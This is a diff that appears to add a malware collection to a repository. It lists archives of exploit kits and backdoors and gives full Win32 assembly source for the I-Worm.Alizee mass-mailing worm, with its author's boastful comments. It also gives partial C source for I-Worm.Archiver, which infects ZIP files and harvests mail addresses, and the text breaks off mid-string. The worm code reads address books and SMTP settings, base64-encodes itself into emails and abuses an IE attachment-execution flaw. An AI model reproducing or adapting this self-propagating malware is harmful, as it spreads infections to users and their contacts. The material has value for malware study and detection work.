diff --git a/Win32/Adrena.7z b/Win32/Adrena.7z new file mode 100644 index 00000000..a7fd6926 Binary files /dev/null and b/Win32/Adrena.7z differ diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Backdoor.Win32.Aryan.7z new file mode 100644 index 00000000..e54b3efe Binary files /dev/null and b/Win32/Backdoor.Win32.Aryan.7z differ diff --git a/Win32/ExploitKit.0x88.7z b/Win32/ExploitKit.0x88.7z new file mode 100644 index 00000000..a47abef5 Binary files /dev/null and b/Win32/ExploitKit.0x88.7z differ diff --git a/Win32/ExploitKit.Blackhole.A.7z b/Win32/ExploitKit.Blackhole.A.7z new file mode 100644 index 00000000..a7c8fe1c Binary files /dev/null and b/Win32/ExploitKit.Blackhole.A.7z differ diff --git a/Win32/ExploitKit.Blackhole.B.7z b/Win32/ExploitKit.Blackhole.B.7z new file mode 100644 index 00000000..f103b5aa Binary files /dev/null and b/Win32/ExploitKit.Blackhole.B.7z differ diff --git a/Win32/ExploitKit.BleedingLife.B.7z b/Win32/ExploitKit.BleedingLife.B.7z new file mode 100644 index 00000000..fe56f864 Binary files /dev/null and b/Win32/ExploitKit.BleedingLife.B.7z differ diff --git a/Win32/ExploitKit.CrimePack.3.1.3.7z b/Win32/ExploitKit.CrimePack.3.1.3.7z new file mode 100644 index 00000000..c0dca486 Binary files /dev/null and b/Win32/ExploitKit.CrimePack.3.1.3.7z differ diff --git a/Win32/ExploitKit.DemonHunter.7z b/Win32/ExploitKit.DemonHunter.7z new file mode 100644 index 00000000..4e9484d1 Binary files /dev/null and b/Win32/ExploitKit.DemonHunter.7z differ diff --git a/Win32/ExploitKit.Eleonore.1.4.4.7z b/Win32/ExploitKit.Eleonore.1.4.4.7z new file mode 100644 index 00000000..96675d9f Binary files /dev/null and b/Win32/ExploitKit.Eleonore.1.4.4.7z differ diff --git a/Win32/I-Worm.Alizee.asm b/Win32/I-Worm.Alizee.asm new file mode 100644 index 00000000..6f4757df --- /dev/null +++ b/Win32/I-Worm.Alizee.asm @@ -0,0 +1,1232 @@ +comment $ + +ey, this comment is added 21 november 2001. i saw that aliz is spreading +pretty, so just some more about-text then the original release (i thought it +would be a worm that nobody would ever know :). + +well, i wrote this worm long ago, in about two days, just cause i was bored. +it was around the time that the iframe sploit was 1-day old, thats all i re- +member and i have no clue how long ago that was. + +anyway, i wanted to code a small worm. i did it, but what then? i didn't wanna +drop it itw cause massmailers are lame. (the total worm is lame, really). +so i decided that it would be nice for coderz #2... that was going to be +released around that days (heheheheeheh a half year later now i write this +text and it still getting released soon). anyway, thats why that text is in +it. i had to fill much space, so thats why that huge stupid text. + +anyway, coderz#2 wasn't getting released for weeks, months, etc, so i decided +to fork the AV's a sample, and i uploaded it to my site, as a binary, in a +zip file with a secret password, as a test sample. + +nothing happens and i forgot the total fuck worm. although avx wrote a +description very fast because they are lame. + +well, 19 november i was just checking f-secure.com, because they have nice +a special section pictures of viruses (payloads) in their description part, +and what did i see: aliz. in the wild... + +woowwie ;) + +now it is high risk blabla on many av sites... + +well, its a lame worm, and i didn't care really cause nobody would really +see it (look over the source). anyway, now it differs a lil i guess ;) + +heh. + +greetings + +mar00n (a lame nick too) + + +description, today i pick f-secure because its the most complimentous desc. ;) + +btw, 'in pure Assembly', did they recognize it or was it because of my text +in the body?: '..power in pure win32asm..' hehe ;)) + +------------------------------------------------------------------------------ +Aliz is a very small e-mail worm written in pure Assembly. It appeared in the +wild on 18-20th of November 2001. The worm's file is only 4 kilobytes long +and its code is compressed. It can be considered one of the smallest Win32 +worms ever created. + +When the worm is run, it first unpacks itself and then passes control to API +address setup routine. When all needed API addresses are collected, the +control is passed to the main worm's code. The worm checks the Registry for +the location of Windows Address Book file and loads it into memory. The worm +then connects to default SMTP server (for SMTP server info the worm checks +Internet Accound Manager data in the Registry) and sends itself to all +recepients of Windows Address Book. The infected message looks like that: + + + + Subject: + Body: + Attachment: Whatever.exe + +The subject of infected message is randomly composed from 5 different parts: + + + + Fw: + Fw: Re: + + + + Cool + Nice + Hot + some + Funny + weird + funky + great + Interesting + many + + + + website + site + pics + urls + pictures + stuff + mp3s + shit + music + info + + + + to check + for you + i found + to see + here + - check it + + + + !! + ! + :-) + ?! + hehe ;-) + +For example a subject can be: "Fw: Cool pictures i found !!" or +"Nice website to check hehe ;-)". + +The message contains a MIME-encoded attachment - the worm's file with +'Whatever.exe' name. The body is an empty multi-part MIME message with HTML +formatting and i-frame trick that was previously found in Nimda and Klez +worms. Because of this trick on some systems the worm is able to self-launch +itself when an infected e-mail is viewed (for example, with Outlook and +IE 5.0 or 5.01). To do this the worm uses a known vulnerability in IE that +allows execution of an email attachment. This vulnerability is fixed and a +patch for it is available on Microsoft site: + +http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp + +The worm doesn't install itself to system, it runs, sends itself out and +terminates its process. + +The worm contains the following text strings that are never displayed: + + + + :::iworm.alizee.by.mar00n!ikx2oo1::: + + + + while typing this text i realize this text got added on many av + description sites, because this silly worm could be easily a + hype. i wonder which av claims '[companyname] stopped high risk + worm before it could escape!' or shit like that. heh, or they + boycot my virus because of this text. well, it is easy enough + for the poor av's to add this worm; since it was only released + as source in coderz#2... btw, loveletter*2 power in pure win32asm + and only a 4k exe file. heh, vbs kiddies, phear win32asm. :) + thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx, + t-2000!ir, ultras!mtx & sweet gigabyte... + btw,burgemeester van sneek: ik zoek nog een baantje... + (alignmentfillingtext) + +F-Secure Anti-Virus detects Aliz worm with the latest updates. + +[Analysis: Alexey Podrezov; F-Secure Corp.; November 19th, 2001] + +------------------------------------------------------------------------------ + + +well and here the old comment + +$ + +comment $ + +iworm alizee by mar00n ! ikx 2oo1 + +alizee is a worm that mails itself around to all addies in your addressbook. + +not very special, is it? + +well: + + 1-it shows that the stack is your best friend + 2-the generated exe file is only 4096 bytes + 3-it shows a clean compatible way in win32asm to obtain email addies + 4-the subject is random generated + 5-the attached exe file gets automatically executed if the reader + tries to read the message + 6-the whole thing is very clean written (who cares) + +indeed, very standard, except step 2 and 5 ;) + +more about them: + +step 2: yes, its very small, the code is compressed using aplib, and + decompressed using my own tweaked optmized aplib decompressor + +step 5: indeed, this means loveletter power*10. (code? search for tag) + + +succesfully tested under win98 & win2k... its nice to talk with your creation +using netcat ;) + +220 hi +helo localhost +250 ey man ;) wassup? do you have mail to send? +mail from: some@one.com +250 and to who? +rcpt to: sucker@microsoft.com +250 seems ok to me +data +354 go ahead ;) ... but don't forget the cr.cr, ok? + +blablablla + +well erh, this worm is very hard to compile, see my zip file for the bat files +and external programs you need. + + +thx: bumblebee for your base64 routines + asmodeus for the first one doing this + +grtz/fear: starzer0,billy,lifewire,vecna,z0mbie,t2k,benny,ratter,griyo + and gig + +ps, i don't love alizee or what. she's just ... highly fuckable? + +$ +.386p +.model flat +locals __ + +include c:\tasm\inc\myinc.inc + +sizer equ 4098 + +binsize equ sizer + 3-(3-(sizer mod 3)) ;stupid 3-alignment for base64 + + +_call macro api + call dword ptr [api] + endm + +maxspread equ 666 ;max mail to n addies + +include c:\tasm\inc\win32api.inc ;luv to jackyqwerty +include c:\tasm\inc\useful.inc +include c:\tasm\inc\winsock.inc + +;extrn LoadLibraryA:proc; +;extrn GetProcAddress:proc; + +;----------------------------------------------------------------------------; +_CODE segment dword use32 public 'CODE' +start: nop ;heh + +_CODE ends +;----------------------------------------------------------------------------; + +.data ;only to use virtual offset 402000 +; int 3 + + call overseh + + jmp $ ;if seh we simply hang. why not? :) + + overseh: + xor edx,edx + push dword ptr fs:[edx] + mov fs:[edx],esp + +;----------------------------------------------------------------------------; + ;ebx=module base/handle + ;esi=crc32s + ;edi=wheretostore + + mov esi,offset apicrcs + mov edi,offset apis + + call __x + db "KERNEL32",0 + __x: + +i_importall_loop: +; call LoadLibraryA + call dword ptr [start+2034h] ;loadlibrary + xchg eax,ebx + call i_importapis ;first import k32 + xor eax,eax + lodsb + xchg eax,ecx + jecxz i_importall_done ;modulenamelength + push esi + add esi,ecx + jmp i_importall_loop +;----------------------------------------------------------------------------; + +i_importall_done: + + sub esp,size stackframe + + sub esp,size stack2 + mov ebp,esp + +; int 3 + + call __y + db "Software\Microsoft\WAB\WAB4\Wab File Name",0 + __y: + push 0 + call readregkey + + lea esi,[ebp.buffer] + + add esp,size stack2 + or eax,eax + jnz exit + + ;esp = filename of wab we choose + + mov ebp,esp + + call openfile + jc exit + + ;esi = wabmapview (nice name;) + + ;int 3 + + mov ecx,[esi+64h] ;number of adds + jecxz exit ;victim has no friends + add esi,[esi+60h] ;pointer addies + +; dec ecx + +; cmp ecx,maxspread +; jbe mailaround +; push maxspread +; pop ecx + + ;parse wab file for addies & mail the fun + +mailaround: + push ecx + + mov eax,esi + cmp byte ptr [esi+1],0 + jne nounicode + + + push esi ;unicode support + lea edi,[ebp.addie] + push edi + + push 48h + pop ecx +__y: + lodsw + stosb + loop __y + + pop eax ;ebp+addie + pop esi ;esi in wab.addresses + add esi,20h + +nounicode: +; int 3 + push ebp + call share ;share the fun + pop ebp + + add esi,24h + + pop ecx + loop mailaround + + push [ebp.createhandle] ;close wabfilehandle + push [ebp.maphandle] + push [ebp.viewhandle] + _call CloseHandle + _call CloseHandle + _call CloseHandle + +exit: add esp,size stackframe + + pop dword ptr fs:[0] + pop eax + + push 0 + _call ExitProcess + +db ":::iworm.alizee.by.mar00n!ikx2oo1:::",0dh,0dh + +db "while typing this text i realize this text got added on many av",0dh +db "description sites, because this silly worm could be easily a",0dh +db "hype. i wonder which av claims '[companyname] stopped high risk",0dh +db "worm before it could escape!' or shit like that. heh, or they",0dh +db "boycot my virus because of this text. well, it is easy enough",0dh +db "for the poor av's to add this worm; since it was only released",0dh +db "as source in coderz#2... btw, loveletter*2 power in pure win32asm",0dh +db "and only a 4k exe file. heh, vbs kiddies, phear win32asm. :)",0dh +db "thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx,",0dh +db "t-2000!ir, ultras!mtx & sweet gigabyte...",0dh +db "btw,burgemeester van sneek: ik zoek nog een baantje...",0dh +db "(alignmentfillingtext)",0dh + + +;----------------------------------------------------------------------------; + +share: push esi + mov esi,eax + + sub esp,size stack2 ;some workspace + mov ebp,esp + + push ebp + push 101h + _call WSAStartup ;startup wsock services + + push 0 + push 1 + push 2 + _call socket ;create socket + xchg eax,edi + + push 25 ;convert port to big/ + _call htons ;lil endian + + mov word ptr [ebp.sockaddr_in \ + .sin_family],AF_INET ;setup connect info + mov [ebp.sockaddr_in.sin_port],ax + + push offset szRegAccountInfo + call __porn + db "SMTP Server",0 + __porn: + call readregkey + jc share_xit + + ;ebx = smtp server name from registry + + push ebx + _call gethostbyname ;resolve + + or eax,eax + jz share_xit + + mov eax,[eax+12] ;no clue what i'm + mov eax,[eax] ;doing here. ctrl+c/v + mov eax,[eax] ;from my other source + ;but i hope eax=IP ;) + + mov dword ptr [ebp.sockaddr_in.sin_addr],eax + + push size ssockaddr_in + lea eax,[ebp.sockaddr_in] + push eax + push edi ;handle + _call connect + or eax,eax + jnz share_xit + + ;int 3 + + mov ebx,offset maildata + call sendstrings ;mail ourself + +clean_xit: + push edi + _call closesocket + _call WSACleanup ;disconnect + +share_xit: + add esp,size stack2 + pop esi + ret + +;----------------------------------------------------------------------------; + + +sendstrings: + xchg ebx,esi ;ebx is now dest. email. add. esi=data + ;and edi is socket handle + +parsemaildata: xor eax,eax + lodsb + cmp al,8 + ja nsend + or al,al + jz parsemaildata + + jmp [fntable-4+eax*4] + + + +nsend: dec esi + call stringsend + jmp parsemaildata + + + + +fntable dd offset checkmailinput + dd offset sendmailfrom + dd offset sendmailto + dd offset senddate + dd offset sendsubject + dd offset sendbase64 + dd offset exitexit + +sendbase64: ;int 3 + + pushad + + push binsize*4 ;oursize*2+base64space + push 0 + _call GlobalAlloc + push eax ;one push for globalfree + push eax ;one push for base64 fun + + xchg eax,edi + + push 0 + _call GetModuleHandleA + + xchg eax,esi + + xor ecx,ecx + +; mov ecx,200h/4 + mov ch,2 + rep movsb ;200h bytes + + add esi,(1000h-200h) + +; mov ecx,0a00h/4 + mov ch,0ah + rep movsb ;a00h bytes + + add esi,(2000h-0a00h) + +; mov ecx,400h/4 + mov ch,2 + rep movsb ;200h + + add esi,(1000h-400h) + +; mov ecx,200h/4 + mov ch,2 + rep movsb ;200h + + + pop eax ;src + lea edx,[eax+binsize+100h] ;dest + push edx + mov ecx,binsize ;in + + call encodebase64 + mov dword ptr [edx],0a0d3dh ; '=/cr/lf/z' + pop esi + mov edi,[esp.Pushad_edi+4] ;jqwerty forever :) + call stringsend + + _call GlobalFree + + popad + + jmp parsemaildata + +;----------------------------------------------------------------------------; +checkmailinput: push 0 + push 300h + lea eax,[ebp.buffer] + push eax + push edi ;handle + _call recv + + lodsw + cmp word ptr [ebp.buffer],ax ;codes match? + je parsemaildata + ret ;no good code -return to clean_xit +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +sendmailfrom: push esi + + +; call __a +;fromwho db "test@localhost",0 +; __a: +; pop esi + + push ebx + + push offset szRegAccountInfo + call __s + db "SMTP Email Address",0 + __s: + call readregkey + mov esi,ebx + pop ebx + call stringsend ;well guess. test! :) + + pop esi +smfx: jmp parsemaildata +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +sendmailto: push esi + mov esi,ebx + call stringsend + pop esi +smtx: jmp smfx +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +senddate: pushad + ;int 3 + + push edi + lea edi,[ebp.buffer] + push edi + + push 100 + push edi + call __x +formdate db "ddd,dd MMM yyyy",0 + __x: + push 0 + push 0 + push 409h + _call GetDateFormatA + add edi,eax + dec edi + mov al,' ' + stosb + + push 100 + push edi + call __y +formtime db "HH:mm:ss",0 + __y: + push 0 + push 0 + push 409h + _call GetTimeFormatA + add edi,eax + dec edi + mov eax,'00- ' + stosd + mov eax,03030h + stosd ;barf + + pop esi + pop edi + call stringsend + + popad + +gsxx: jmp smtx +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +exitexit: ;int 3 + ret +;----------------------------------------------------------------------------; + + +;----------------------------------------------------------------------------; +sendsubject: pushad + ;int 3 + + mov esi,offset gendata + push edi + lea edi,[ebp.buffer] + push edi + +hehe: + xor eax,eax + lodsb + + cmp al,31 + je done + + call get_rnd_range + xchg eax,ecx + +__l: or ecx,ecx + jz __b +__f: lodsb + or al,al + jnz __f + loop __l + +__b: lodsb + cmp al,0 + je __d + stosb + jmp __b +__d: mov al,' ' + stosb + +__g: lodsb + cmp al,0 + je __g + cmp al,' ' + jae __g + dec esi + jmp hehe + +done: + mov al,0 + stosb + pop esi + pop edi + call stringsend + popad + jmp gsxx + +gendata db 5 + db 0 + db 0 + db 0 + db "Fw:",0 + db "Fw: Re:",0 + + db 11 + db 0 + db "Cool",0 + db "Nice",0 + db "Hot",0 + db "some",0 + db "Funny",0 + db "weird",0 + db "funky",0 + db "great",0 + db "Interesting",0 + db "many",0 + + db 10 + db "website",0 + db "site",0 + db "pics",0 + db "urls",0 + db "pictures",0 + db "stuff",0 + db "mp3s",0 + db "shit",0 + db "music",0 + db "info",0 + + db 7 + db "to check",0 + db "for you",0 + db "i found",0 + db "to see",0 + db "here",0 + db "- check it",0 + db 0 + + db 6 + db "!!",0 + db "!",0 + db ":-)",0 ;lets use lame cool-to-newbies smileys ;P + db "?!",0 + db "hehe ;-)",0 + db 0 + + db 31 ;terminator + + +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +stringsend: push esi + + xor ecx,ecx + dec ecx + +__x: lodsb + inc ecx + cmp al,8 + ja __x + + pop esi + push ecx + + push 0 ;flags + push ecx ;length + push esi ;datastart + push edi ;handle + _call send + + pop ecx + +; push 10 +; _call Sleep + + add esi,ecx + ret +;----------------------------------------------------------------------------; + +get_rnd_range: push ecx ;luv to griyo + push edx + mov ecx,eax + call get_rnd32 + xor edx,edx + div ecx + mov eax,edx + pop edx + pop ecx + ret + + +get_rnd32: ;Stolen from prizzy's Crypto + push ebx ecx edx + mov eax,dword ptr [ebp.rnd32seed] + mov ecx,41C64E6Dh + mul ecx + xchg eax,ecx + _call GetTickCount + mov ebx,eax + db 0Fh, 31h ;RDTCS instruction - read + xor eax,ebx + xchg ecx,eax ;PCs ticks to EDX:EAX + mul ecx + add eax,00003039h + mov dword ptr [ebp.rnd32seed],eax + pop edx ecx ebx + ret + +;----------------------------------------------------------------------------; + +encodebase64: ; encodeBase64 by Bumblebee. All rights reserved ;) +; input: +; EAX = Address of data to encode +; EDX = Address to put encoded data +; ECX = Size of data to encode +; output: +; ECX = size of encoded data +; + xor esi,esi + call over_enc_table + db "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + db "abcdefghijklmnopqrstuvwxyz" + db "0123456789+/" +over_enc_table: + pop edi + push ebp + xor ebp,ebp +baseLoop: + movzx ebx,byte ptr [eax] + shr bl,2 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + mov bx,word ptr [eax] + xchg bl,bh + shr bx,4 + mov bh,0 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl,bh + shr bx,6 + xor bh,bh + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + xor ebx,ebx + movzx ebx,byte ptr [eax] + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + inc eax + + inc ebp + cmp ebp,24 + jna DontAddEndOfLine + + xor ebp,ebp ; add a new line + mov word ptr [edx+esi],0A0Dh + inc esi + inc esi + test al,00h ; Optimized (overlap rlz!) + org $-1 +DontAddEndOfLine: + inc ebp + sub ecx,3 + or ecx,ecx + jne baseLoop + + mov ecx,esi + add edx,esi + pop ebp + ret +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +readregkey: + lea eax,[ebp.regkeyhnd] + push eax + push dword ptr [esp+3*4] + push 80000001h ;hkey current user + _call RegCreateKeyA + or eax,eax + jnz rrke + +more_data: push 127 + push esp + lea ebx,[ebp.buffer] + push ebx + push 0 + push 0 + push dword ptr [esp+18h] + push [ebp.regkeyhnd] + _call RegQueryValueExA ;read stmp server + pop ecx + cmp eax,234 + je more_data ;?? + or eax,eax + jnz rrke + + push [ebp.regkeyhnd] + _call RegCloseKey + clc + ret 8 + +rrke: stc + ret 8 +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +openfile: xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push ebx + push GENERIC_READ or GENERIC_WRITE + push esi + _call CreateFileA + inc eax + jz foerroropening + dec eax + mov dword ptr [ebp.createhandle],eax + + push ebx + push ebx ;max size low + push ebx + push PAGE_READWRITE + push ebx + push eax ;handle + _call CreateFileMappingA + mov dword ptr [ebp.maphandle],eax + + push ebx + push ebx + push ebx + push FILE_MAP_WRITE + push eax ;handle + _call MapViewOfFile + mov dword ptr [ebp.viewhandle],eax + xchg eax,esi + clc + ret +foerroropening: stc + ret +;----------------------------------------------------------------------------; + + ; ebx=module base/handle + ; edi=where to store + ; esi=crc32 stuff +i_importapis: + mov eax,[ebx+03ch] ;pointer to PE + mov edx,[eax+ebx+78h] ;export section + add edx,ebx + +i_ia_nextone: + lodsd + or eax,eax + jz i_ia_done + push esi + xchg eax,ecx ;ecx=desired crc32 + + mov esi,[edx+8*4] ;addresses of ApiNames + add esi,ebx +i_ia_find: + lodsd ;address + push esi + add eax,ebx ;add base + push eax ;save base for later + xchg eax,esi + call v_crc32 + cmp eax,ecx ;actual crc32=desired? + pop eax + pop esi + jne i_ia_find ;nope.. then next + + push edx ;preserve edx + + push eax ;eax=name + push ebx +; call GetProcAddress + call dword ptr [start+2038h] + + pop edx + + stosd + + pop esi + jmp i_ia_nextone +i_ia_done: + ret + +v_crc32: ;ofcourse i stole this... :) + push edx + mov edx,09C3B248Eh + __gCRC32_next_byte: + lodsb + or al,al ;end of name ? + jz __gCRC32_finish + + xor dl,al + mov al,08h + __gCRC32_next_bit: + shr edx,01h + jnc __gCRC32_no_change + xor edx,0C1A7F39Ah + __gCRC32_no_change: + dec al + jnz __gCRC32_next_bit + jmp __gCRC32_next_byte + __gCRC32_finish: + xchg eax,edx ;CRC32 to EAX + pop edx + ret + + + + +szRegAccountInfo db "Software\Microsoft\Internet Account Manager\Accounts\00000001",0 + +mCheck equ 1 ;recv/checkfor +mFromAd equ 2 ;mailfrom addy +mDestAd equ 3 ;sendto addy +mTime equ 4 ;right time/date field +mSubj equ 5 ;random generated subject +mBase64 equ 6 ;base64 data +mEom equ 7 ;endofmail + + +;----------------------------------------------------------------------------; +; *** the email data *** ; + + +; smtp commands +;----------------------------------------------------------------------------; + +crlf equ 0dh,0ah +crlfz equ crlf,0 +maildata db mCheck,'22' ;--check 220 greet + db 'HELO localhost',crlf ;HELO localhost + db mCheck,'25' ;--check 250 + db 'MAIL FROM: ',mFromAd,crlf ;MAIL FROM: addie + db mCheck,'25' ;--check 250 + db 'RCPT TO: ',mDestAd,crlf ;RCPT TO: addie + db mCheck,'25' ;--check 250 + db 'DATA',crlf ;DATA + db mCheck,'35' ;--check 354 + +; stupid default stuph +;----------------------------------------------------------------------------; + +db 'From: ',mFromAd,crlf +db 'To: ',mDestAd,crlf +db 'Subject: ',mSubj,crlf +db 'Date: ',mTime,crlf + + ;mime headers +;----------------------------------------------------------------------------; + +db 'MIME-Version: 1.0',crlf +db 'Content-Type: multipart/mixed;',crlf +db ' boundary="bound"',crlf +db ' X-Priority: 3',crlf +db ' X-MSMail-Priority: Normal',crlf +db ' X-Mailer: Microsoft Outlook Express 5.50.4522.1300',crlf +db ' X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1300',crlf +db crlf +db 'This is a multi-part message in MIME format.',crlf +db crlf + + ;first part: html code to run the sploit +;----------------------------------------------------------------------------; + +db '--bound',crlf +db 'Content-Type: text/html;',crlf +db ' charset="iso-8859-1"',crlf +db 'Content-Transfer-Encoding: quoted-printable',crlf +db crlf +db '',crlf +db 'peace',crlf +db crlf + + ;next part - the sploit +;----------------------------------------------------------------------------; + +db '--bound',crlf +db 'Content-Type: audio/x-wav;',crlf +db ' name="whatever.exe"',crlf +db 'Content-Transfer-Encoding: base64',crlf +db 'Content-ID: ',crlf +db crlf + + ;base64 stuff +;----------------------------------------------------------------------------; +db mBase64 + + ;end boundary & quit command +;----------------------------------------------------------------------------; + +db crlf,'--bound--',crlf,'.',crlf +db 'QUIT',crlf,mEom + +;----------------------------------------------------------------------------; + +apicrcs: +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m + dd 0 + + db 9 + db "ADVAPI32",0 +crc32m +crc32m +crc32m +dd 0 + + db 8 + db "WSOCK32",0 +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m + dd 0 + db 0 + + +db "END" + +apis: + +GetWindowsDirectoryA dd ? +CloseHandle dd ? +ExitProcess dd ? +GlobalAlloc dd ? +GetModuleHandleA dd ? +GlobalFree dd ? +GetDateFormatA dd ? +GetTimeFormatA dd ? +Sleep dd ? +GetTickCount dd ? +CreateFileA dd ? +CreateFileMappingA dd ? +MapViewOfFile dd ? + + +RegCreateKeyA dd ? + +RegQueryValueExA dd ? +RegCloseKey dd ? + + +WSAStartup dd ? +socket dd ? +htons dd ? +gethostbyname dd ? +connect dd ? +closesocket dd ? +recv dd ? +send dd ? +WSACleanup dd ? + + + +totalend: + +stackframe struc + +createhandle dd ? +maphandle dd ? +viewhandle dd ? +addie db 48h dup (?) + +stackframe ends + + + +stack2 struc + +regkeyhnd dd ? +sockaddr_in ssockaddr_in ? +buffer db 300h dup (?) +rnd32seed dd ? +;space WSADATA ? +ends + + end start + end + + diff --git a/Win32/I-Worm.Archiver.c b/Win32/I-Worm.Archiver.c new file mode 100644 index 00000000..cf4568b8 --- /dev/null +++ b/Win32/I-Worm.Archiver.c @@ -0,0 +1,227 @@ +/* +Name : I-Worm.Archiver +Author : PetiK +Date : Mai 10th 2002 - +Language : C++ + +Comments : Infect ZIP files which run with WINZIP. + + We can also to do the same think with PowerArchiver: + powerarc -a -c4 archive.zip virus.exe + +*/ + +#include +#include +#include + +#pragma argused +#pragma inline + + +char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50]; +char *fnam[]={"news","support","info","newsletter","webmaster"}; +char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"}; +LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", + SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; +char attname[]="news_xxxxxxxx.exe"; +LPTSTR cmdLine,ptr; +BOOL installed; +BYTE desktop[50],favoris[50],personal[50],winzip[50]; +DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris), + sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip); +DWORD type=REG_SZ; +long i; + +LHANDLE session; +MapiMessage *mes; +MapiRecipDesc from; +char messId[512],mname[50],maddr[30]; +HINSTANCE hMAPI; + +HKEY hReg; +WIN32_FIND_DATA ffile; + +void infzip(char *); + +ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); +ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); +ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); +ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); +ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); +ULONG (PASCAL FAR *mFreeBuffer)(LPVOID); + +int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) +{ + +GetModuleFileName(hInst,filen,100); +GetSystemDirectory((char *)sysdir,100); +GetWindowsDirectory((char *)copyn,100); +strcpy(windir,copyn); +strcat(copyn,"\\Archiver.exe"); + +installed=FALSE; +cmdLine=GetCommandLine(); +if(cmdLine) { + for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++); + if(ptr[0]=='-' && ptr[1]!=0) { + switch(ptr[1]) { + default: + break; + case 'i': + installed=TRUE; + break; + case 'p': + ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0); + MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002", + "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION); + ExitProcess(0); + break; + } + } + } + +if(!installed) { +CopyFile(filen,copyn,FALSE); +strcpy(copyreg,copyn); +strcat(copyreg," -i"); +/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg); +RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100); +RegCloseKey(hReg); */ +ExitProcess(0); +} + +RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); +RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); +RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); +RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); +RegCloseKey(hReg); +RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg); +RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip); +RegCloseKey(hReg); + +if(strlen(winzip)!=0) { +infzip(windir); +infzip(sysdir); +infzip(desktop); +infzip(personal); +infzip(favoris); +infzip("C:\\"); +} + +/* +_asm +{ +call @wininet +db "WININET.DLL",0 +@wininet: +call LoadLibrary +test eax,eax +jz end_asm +mov ebp,eax +call @inetconnect +db "InternetGetConnectedState",0 +@inetconnect: +push ebp +call GetProcAddress +test eax,eax +jz end_wininet +mov edi,eax +verf: +push 0 +push Tmp +call edi +dec eax +jnz verf + +end_wininet: +push ebp +call FreeLibrary +end_asm: +jmp end_all_asm + +Tmp dd 0 + +end_all_asm: +} + + +hMAPI=LoadLibrary("MAPI32.DLL"); +(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); +(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); +(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); +(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); +(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); +(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); +mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); +if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { + do { + if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { + strcpy(mname,mes->lpOriginator->lpszName); + strcpy(maddr,mes->lpOriginator->lpszAddress); + + for(i=0;i<8;i++) + attname[i+5]='1'+(char)(9*rand()/RAND_MAX); + fsubj[0]=0; + wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]); + + + mes->ulReserved=0; + mes->lpszSubject=fsubj; + mes->lpszNoteText="This is some 